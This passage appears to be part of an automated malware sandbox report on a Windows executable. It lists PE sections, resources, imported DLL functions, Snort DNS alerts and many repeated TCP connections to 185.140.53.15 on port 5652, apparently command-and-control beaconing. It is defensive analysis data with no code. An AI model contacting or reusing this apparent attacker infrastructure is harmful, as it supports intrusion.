                            ......0x770000xa500xc00False0.535807291667data5.68654279388IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                            .....0x780000x26040x2800False0.41875data4.27539272227IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                            ....0x7b0000x38d80x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                            ......0x7f0000x28e60x2a00False0.317057291667data5.12299679952IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                            ....0x820000x340x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                            ......0x830000x300x200False0.1015625data0.606751191078IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            ......0x840000x72300x7400False0.623013200431data6.65937740819IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                            .....0x8c0000x72fc20x73000False0.558258322011data6.93563526848IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                            Resources

                            NameRVASizeTypeLanguageCountry
                            TMAP0x8caf40x197ebASCII text, with very long lines, with CRLF line terminatorsEnglishUnited States
                            RT_CURSOR0xa62e00x134dataEnglishUnited States
                            RT_CURSOR0xa64140x134dataEnglishUnited States
                            RT_CURSOR0xa65480x134dataEnglishUnited States
                            RT_CURSOR0xa667c0x134dataEnglishUnited States
                            RT_CURSOR0xa67b00x134dataEnglishUnited States
                            RT_CURSOR0xa68e40x134dataEnglishUnited States
                            RT_CURSOR0xa6a180x134dataEnglishUnited States
                            RT_BITMAP0xa6b4c0x1d0dataEnglishUnited States
                            RT_BITMAP0xa6d1c0x1e4dataEnglishUnited States
                            RT_BITMAP0xa6f000x1d0dataEnglishUnited States
                            RT_BITMAP0xa70d00x1d0dataEnglishUnited States
                            RT_BITMAP0xa72a00x1d0dataEnglishUnited States
                            RT_BITMAP0xa74700x1d0dataEnglishUnited States
                            RT_BITMAP0xa76400x1d0dataEnglishUnited States
                            RT_BITMAP0xa78100x1d0dataEnglishUnited States
                            RT_BITMAP0xa79e00x1d0dataEnglishUnited States
                            RT_BITMAP0xa7bb00x1d0dataEnglishUnited States
                            RT_BITMAP0xa7d800x506e0dataEnglishUnited States
                            RT_BITMAP0xf84600xe8GLS_BINARY_LSB_FIRSTEnglishUnited States
                            RT_ICON0xf85480x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                            RT_ICON0xf89b00x988dataEnglishUnited States
                            RT_ICON0xf93380x10a8dataEnglishUnited States
                            RT_ICON0xfa3e00x25a8dataEnglishUnited States
                            RT_DIALOG0xfc9880x52data
                            RT_DIALOG0xfc9dc0x52data
                            RT_STRING0xfca300x148data
                            RT_STRING0xfcb780x390data
                            RT_STRING0xfcf080x1a4data
                            RT_STRING0xfd0ac0xc8data
                            RT_STRING0xfd1740x118data
                            RT_STRING0xfd28c0x39cdata
                            RT_STRING0xfd6280x390data
                            RT_STRING0xfd9b80x370data
                            RT_STRING0xfdd280x3ccdata
                            RT_STRING0xfe0f40x214data
                            RT_STRING0xfe3080xccdata
                            RT_STRING0xfe3d40x194data
                            RT_STRING0xfe5680x3c4data
                            RT_STRING0xfe92c0x338data
                            RT_STRING0xfec640x294data
                            RT_GROUP_CURSOR0xfeef80x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                            RT_GROUP_CURSOR0xfef0c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                            RT_GROUP_CURSOR0xfef200x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                            RT_GROUP_CURSOR0xfef340x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                            RT_GROUP_CURSOR0xfef480x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                            RT_GROUP_CURSOR0xfef5c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                            RT_GROUP_CURSOR0xfef700x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                            RT_GROUP_ICON0xfef840x3edataEnglishUnited States

                            Imports

                            DLLImport
                            oleaut32.dllSysFreeString, SysReAllocStringLen, SysAllocStringLen
                            advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey
                            user32.dllGetKeyboardType, DestroyWindow, LoadStringA, MessageBoxA, CharNextA
                            kernel32.dllGetACP, Sleep, VirtualFree, VirtualAlloc, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, CompareStringA, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle
                            kernel32.dllTlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
                            user32.dllCreateWindowExA, WindowFromPoint, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, SetWindowsHookExA, SetWindowPos, SetWindowPlacement, SetWindowLongW, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageW, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageW, PeekMessageA, OffsetRect, OemToCharA, MessageBoxA, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageW, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongW, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMessageTime, GetMessagePos, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameA, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassLongA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EnumChildWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawEdge, DispatchMessageW, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerBuffA, CharLowerA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
                            gdi32.dllUnrealizeObject, StretchBlt, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetMapMode, SetEnhMetaFileBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, Rectangle, RectVisible, RealizePalette, Polyline, PlayEnhMetaFile, PatBlt, MoveToEx, MaskBlt, LineTo, LPtoDP, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetPixel, GetPaletteEntries, GetObjectA, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileDescriptionA, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, ExcludeClipRect, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateEnhMetaFileA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, CloseEnhMetaFile, BitBlt
                            version.dllVerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
                            kernel32.dlllstrcpyA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualProtect, VirtualAlloc, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MultiByteToWideChar, MulDiv, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalSize, GlobalLock, GlobalFree, GlobalFindAtomA, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetVersionExA, GetVersion, GetUserDefaultLCID, GetTickCount, GetThreadLocale, GetStdHandle, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCPInfo, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FindResourceA, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
                            advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegFlushKey, RegCloseKey
                            oleaut32.dllGetErrorInfo, SysFreeString
                            ole32.dllCreateStreamOnHGlobal, IsAccelerator, OleDraw, OleSetMenuDescriptor, CoCreateInstance, CoGetClassObject, CoUninitialize, CoInitialize, IsEqualGUID
                            kernel32.dllSleep
                            oleaut32.dllSafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy, VariantClear, VariantInit
                            comctl32.dll_TrackMouseEvent, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_DragShowNolock, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create
                            URLInetIsOffline

                            Possible Origin

                            Language of compilation systemCountry where language is spokenMap
                            EnglishUnited States

                            Network Behavior

                            Snort IDS Alerts

                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                            09/27/21-20:40:26.090744UDP254DNS SPOOF query response with TTL of 1 min. and no authority53499108.8.8.8192.168.2.4
                            09/27/21-20:40:28.212397UDP254DNS SPOOF query response with TTL of 1 min. and no authority53645498.8.8.8192.168.2.4
                            09/27/21-20:40:47.445765UDP254DNS SPOOF query response with TTL of 1 min. and no authority53617218.8.8.8192.168.2.4
                            09/27/21-20:40:49.554492UDP254DNS SPOOF query response with TTL of 1 min. and no authority53512558.8.8.8192.168.2.4
                            09/27/21-20:40:52.234039UDP254DNS SPOOF query response with TTL of 1 min. and no authority53615228.8.8.8192.168.2.4
                            09/27/21-20:41:03.235649UDP254DNS SPOOF query response with TTL of 1 min. and no authority53597948.8.8.8192.168.2.4
                            09/27/21-20:41:17.924951UDP254DNS SPOOF query response with TTL of 1 min. and no authority53534188.8.8.8192.168.2.4
                            09/27/21-20:41:30.956044UDP254DNS SPOOF query response with TTL of 1 min. and no authority53512758.8.8.8192.168.2.4
                            09/27/21-20:41:33.111673UDP254DNS SPOOF query response with TTL of 1 min. and no authority53634928.8.8.8192.168.2.4
                            09/27/21-20:41:39.455292UDP254DNS SPOOF query response with TTL of 1 min. and no authority53570918.8.8.8192.168.2.4
                            09/27/21-20:41:43.690538UDP254DNS SPOOF query response with TTL of 1 min. and no authority53544508.8.8.8192.168.2.4

                            Network Port Distribution

                            TCP Packets

                            TimestampSource PortDest PortSource IPDest IP
                            Sep 27, 2021 20:40:26.099253893 CEST497715652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:40:26.126665115 CEST565249771185.140.53.15192.168.2.4
                            Sep 27, 2021 20:40:26.633711100 CEST497715652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:40:26.662739038 CEST565249771185.140.53.15192.168.2.4
                            Sep 27, 2021 20:40:27.162794113 CEST497715652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:40:27.188055992 CEST565249771185.140.53.15192.168.2.4
                            Sep 27, 2021 20:40:28.213025093 CEST497745652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:40:28.239039898 CEST565249774185.140.53.15192.168.2.4
                            Sep 27, 2021 20:40:28.740093946 CEST497745652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:40:28.767437935 CEST565249774185.140.53.15192.168.2.4
                            Sep 27, 2021 20:40:29.266966105 CEST497745652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:40:29.292431116 CEST565249774185.140.53.15192.168.2.4
                            Sep 27, 2021 20:40:30.311638117 CEST497755652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:40:30.337019920 CEST565249775185.140.53.15192.168.2.4
                            Sep 27, 2021 20:40:30.847476959 CEST497755652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:40:30.873163939 CEST565249775185.140.53.15192.168.2.4
                            Sep 27, 2021 20:40:31.382426977 CEST497755652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:40:31.408561945 CEST565249775185.140.53.15192.168.2.4
                            Sep 27, 2021 20:40:32.568515062 CEST497765652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:40:32.593892097 CEST565249776185.140.53.15192.168.2.4
                            Sep 27, 2021 20:40:33.097670078 CEST497765652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:40:33.122795105 CEST565249776185.140.53.15192.168.2.4
                            Sep 27, 2021 20:40:33.629543066 CEST497765652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:40:33.654998064 CEST565249776185.140.53.15192.168.2.4
                            Sep 27, 2021 20:40:35.528153896 CEST497775652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:40:35.553522110 CEST565249777185.140.53.15192.168.2.4
                            Sep 27, 2021 20:40:36.104592085 CEST497775652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:40:36.129878044 CEST565249777185.140.53.15192.168.2.4
                            Sep 27, 2021 20:40:36.704710960 CEST497775652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:40:36.730668068 CEST565249777185.140.53.15192.168.2.4
                            Sep 27, 2021 20:40:37.749738932 CEST497825652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:40:37.775094986 CEST565249782185.140.53.15192.168.2.4
                            Sep 27, 2021 20:40:38.275748014 CEST497825652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:40:38.302005053 CEST565249782185.140.53.15192.168.2.4
                            Sep 27, 2021 20:40:38.806431055 CEST497825652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:40:38.833870888 CEST565249782185.140.53.15192.168.2.4
                            Sep 27, 2021 20:40:39.854981899 CEST497835652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:40:39.880990028 CEST565249783185.140.53.15192.168.2.4
                            Sep 27, 2021 20:40:40.382126093 CEST497835652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:40:46.383398056 CEST497835652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:40:46.409064054 CEST565249783185.140.53.15192.168.2.4
                            Sep 27, 2021 20:40:47.448198080 CEST497905652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:40:47.475070000 CEST565249790185.140.53.15192.168.2.4
                            Sep 27, 2021 20:40:47.975523949 CEST497905652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:40:48.000745058 CEST565249790185.140.53.15192.168.2.4
                            Sep 27, 2021 20:40:48.500801086 CEST497905652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:40:48.526865005 CEST565249790185.140.53.15192.168.2.4
                            Sep 27, 2021 20:40:49.562388897 CEST497925652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:40:49.588556051 CEST565249792185.140.53.15192.168.2.4
                            Sep 27, 2021 20:40:50.090642929 CEST497925652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:40:50.116292953 CEST565249792185.140.53.15192.168.2.4
                            Sep 27, 2021 20:40:50.620203018 CEST497925652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:40:50.645873070 CEST565249792185.140.53.15192.168.2.4
                            Sep 27, 2021 20:40:52.249577045 CEST497935652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:40:52.275001049 CEST565249793185.140.53.15192.168.2.4
                            Sep 27, 2021 20:40:52.867918015 CEST497935652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:40:52.895874977 CEST565249793185.140.53.15192.168.2.4
                            Sep 27, 2021 20:40:53.468501091 CEST497935652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:40:53.495196104 CEST565249793185.140.53.15192.168.2.4
                            Sep 27, 2021 20:40:54.516490936 CEST497945652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:40:54.542279959 CEST565249794185.140.53.15192.168.2.4
                            Sep 27, 2021 20:40:55.076044083 CEST497945652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:40:55.101849079 CEST565249794185.140.53.15192.168.2.4
                            Sep 27, 2021 20:40:55.676054955 CEST497945652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:40:55.701675892 CEST565249794185.140.53.15192.168.2.4
                            Sep 27, 2021 20:40:56.810127020 CEST497965652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:40:56.836287975 CEST565249796185.140.53.15192.168.2.4
                            Sep 27, 2021 20:40:57.367189884 CEST497965652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:40:57.392453909 CEST565249796185.140.53.15192.168.2.4
                            Sep 27, 2021 20:40:57.967570066 CEST497965652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:40:57.994271994 CEST565249796185.140.53.15192.168.2.4
                            Sep 27, 2021 20:40:59.016191959 CEST498095652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:40:59.042155027 CEST565249809185.140.53.15192.168.2.4
                            Sep 27, 2021 20:40:59.542375088 CEST498095652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:40:59.568694115 CEST565249809185.140.53.15192.168.2.4
                            Sep 27, 2021 20:41:00.069375992 CEST498095652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:41:00.096935987 CEST565249809185.140.53.15192.168.2.4
                            Sep 27, 2021 20:41:01.115319967 CEST498145652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:41:01.140680075 CEST565249814185.140.53.15192.168.2.4
                            Sep 27, 2021 20:41:01.643546104 CEST498145652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:41:01.668754101 CEST565249814185.140.53.15192.168.2.4
                            Sep 27, 2021 20:41:02.169558048 CEST498145652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:41:02.195699930 CEST565249814185.140.53.15192.168.2.4
                            Sep 27, 2021 20:41:03.238528013 CEST498185652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:41:03.264319897 CEST565249818185.140.53.15192.168.2.4
                            Sep 27, 2021 20:41:03.855710983 CEST498185652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:41:03.881481886 CEST565249818185.140.53.15192.168.2.4
                            Sep 27, 2021 20:41:04.455780983 CEST498185652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:41:04.481502056 CEST565249818185.140.53.15192.168.2.4
                            Sep 27, 2021 20:41:05.535041094 CEST498215652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:41:05.563955069 CEST565249821185.140.53.15192.168.2.4
                            Sep 27, 2021 20:41:06.155870914 CEST498215652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:41:06.181652069 CEST565249821185.140.53.15192.168.2.4
                            Sep 27, 2021 20:41:06.755912066 CEST498215652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:41:06.782246113 CEST565249821185.140.53.15192.168.2.4
                            Sep 27, 2021 20:41:07.804713011 CEST498225652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:41:07.830929995 CEST565249822185.140.53.15192.168.2.4
                            Sep 27, 2021 20:41:08.465043068 CEST498225652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:41:08.491796970 CEST565249822185.140.53.15192.168.2.4
                            Sep 27, 2021 20:41:09.067141056 CEST498225652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:41:09.093024969 CEST565249822185.140.53.15192.168.2.4
                            Sep 27, 2021 20:41:11.281912088 CEST498235652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:41:11.307770967 CEST565249823185.140.53.15192.168.2.4
                            Sep 27, 2021 20:41:11.856374025 CEST498235652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:41:11.882030010 CEST565249823185.140.53.15192.168.2.4
                            Sep 27, 2021 20:41:12.456403971 CEST498235652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:41:12.481872082 CEST565249823185.140.53.15192.168.2.4
                            Sep 27, 2021 20:41:13.500864983 CEST498295652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:41:13.528048038 CEST565249829185.140.53.15192.168.2.4
                            Sep 27, 2021 20:41:14.056458950 CEST498295652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:41:14.082390070 CEST565249829185.140.53.15192.168.2.4
                            Sep 27, 2021 20:41:14.656506062 CEST498295652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:41:14.686913967 CEST565249829185.140.53.15192.168.2.4
                            Sep 27, 2021 20:41:15.709825039 CEST498315652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:41:15.735502005 CEST565249831185.140.53.15192.168.2.4
                            Sep 27, 2021 20:41:16.256684065 CEST498315652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:41:16.282218933 CEST565249831185.140.53.15192.168.2.4
                            Sep 27, 2021 20:41:16.856717110 CEST498315652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:41:16.882626057 CEST565249831185.140.53.15192.168.2.4
                            Sep 27, 2021 20:41:17.925641060 CEST498365652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:41:17.950985909 CEST565249836185.140.53.15192.168.2.4
                            Sep 27, 2021 20:41:18.456785917 CEST498365652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:41:18.483309984 CEST565249836185.140.53.15192.168.2.4
                            Sep 27, 2021 20:41:19.056817055 CEST498365652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:41:19.083744049 CEST565249836185.140.53.15192.168.2.4
                            Sep 27, 2021 20:41:20.110378981 CEST498415652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:41:20.141074896 CEST565249841185.140.53.15192.168.2.4
                            Sep 27, 2021 20:41:20.646934986 CEST498415652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:41:20.672533035 CEST565249841185.140.53.15192.168.2.4
                            Sep 27, 2021 20:41:21.173989058 CEST498415652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:41:21.199476004 CEST565249841185.140.53.15192.168.2.4
                            Sep 27, 2021 20:41:22.219979048 CEST498425652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:41:22.245400906 CEST565249842185.140.53.15192.168.2.4
                            Sep 27, 2021 20:41:22.749006987 CEST498425652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:41:22.774339914 CEST565249842185.140.53.15192.168.2.4
                            Sep 27, 2021 20:41:23.288388014 CEST498425652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:41:23.318268061 CEST565249842185.140.53.15192.168.2.4
                            Sep 27, 2021 20:41:24.337033033 CEST498435652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:41:24.363328934 CEST565249843185.140.53.15192.168.2.4
                            Sep 27, 2021 20:41:24.866652966 CEST498435652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:41:24.892354012 CEST565249843185.140.53.15192.168.2.4
                            Sep 27, 2021 20:41:25.397974968 CEST498435652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:41:25.424838066 CEST565249843185.140.53.15192.168.2.4
                            Sep 27, 2021 20:41:26.454720020 CEST498445652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:41:26.481374025 CEST565249844185.140.53.15192.168.2.4
                            Sep 27, 2021 20:41:26.991803885 CEST498445652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:41:27.017288923 CEST565249844185.140.53.15192.168.2.4
                            Sep 27, 2021 20:41:27.523144960 CEST498445652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:41:27.549626112 CEST565249844185.140.53.15192.168.2.4
                            Sep 27, 2021 20:41:28.604499102 CEST498455652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:41:28.629947901 CEST565249845185.140.53.15192.168.2.4
                            Sep 27, 2021 20:41:29.135026932 CEST498455652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:41:29.164258957 CEST565249845185.140.53.15192.168.2.4
                            Sep 27, 2021 20:41:29.679605961 CEST498455652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:41:29.705378056 CEST565249845185.140.53.15192.168.2.4
                            Sep 27, 2021 20:41:30.956877947 CEST498465652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:41:30.982530117 CEST565249846185.140.53.15192.168.2.4
                            Sep 27, 2021 20:41:31.492367029 CEST498465652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:41:31.518776894 CEST565249846185.140.53.15192.168.2.4
                            Sep 27, 2021 20:41:32.023648977 CEST498465652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:41:32.049479008 CEST565249846185.140.53.15192.168.2.4
                            Sep 27, 2021 20:41:33.112512112 CEST498475652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:41:33.139110088 CEST565249847185.140.53.15192.168.2.4
                            Sep 27, 2021 20:41:33.648641109 CEST498475652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:41:33.674082994 CEST565249847185.140.53.15192.168.2.4
                            Sep 27, 2021 20:41:34.179969072 CEST498475652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:41:34.205533028 CEST565249847185.140.53.15192.168.2.4
                            Sep 27, 2021 20:41:35.229579926 CEST498485652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:41:35.255750895 CEST565249848185.140.53.15192.168.2.4
                            Sep 27, 2021 20:41:35.758285046 CEST498485652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:41:35.784475088 CEST565249848185.140.53.15192.168.2.4
                            Sep 27, 2021 20:41:36.289539099 CEST498485652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:41:36.315488100 CEST565249848185.140.53.15192.168.2.4
                            Sep 27, 2021 20:41:37.338762999 CEST498495652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:41:37.364265919 CEST565249849185.140.53.15192.168.2.4
                            Sep 27, 2021 20:41:37.867872000 CEST498495652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:41:37.893913984 CEST565249849185.140.53.15192.168.2.4
                            Sep 27, 2021 20:41:38.399072886 CEST498495652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:41:38.424658060 CEST565249849185.140.53.15192.168.2.4
                            Sep 27, 2021 20:41:39.455862999 CEST498515652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:41:39.482280970 CEST565249851185.140.53.15192.168.2.4
                            Sep 27, 2021 20:41:39.992872953 CEST498515652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:41:40.018836975 CEST565249851185.140.53.15192.168.2.4
                            Sep 27, 2021 20:41:40.524198055 CEST498515652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:41:40.551223040 CEST565249851185.140.53.15192.168.2.4
                            Sep 27, 2021 20:41:41.571621895 CEST498625652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:41:41.596802950 CEST565249862185.140.53.15192.168.2.4
                            Sep 27, 2021 20:41:42.102488041 CEST498625652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:41:42.128117085 CEST565249862185.140.53.15192.168.2.4
                            Sep 27, 2021 20:41:42.633773088 CEST498625652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:41:42.659243107 CEST565249862185.140.53.15192.168.2.4
                            Sep 27, 2021 20:41:43.691113949 CEST498715652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:41:43.717178106 CEST565249871185.140.53.15192.168.2.4
                            Sep 27, 2021 20:41:44.227658987 CEST498715652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:41:44.253036022 CEST565249871185.140.53.15192.168.2.4
                            Sep 27, 2021 20:41:44.759078026 CEST498715652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:41:44.785418987 CEST565249871185.140.53.15192.168.2.4
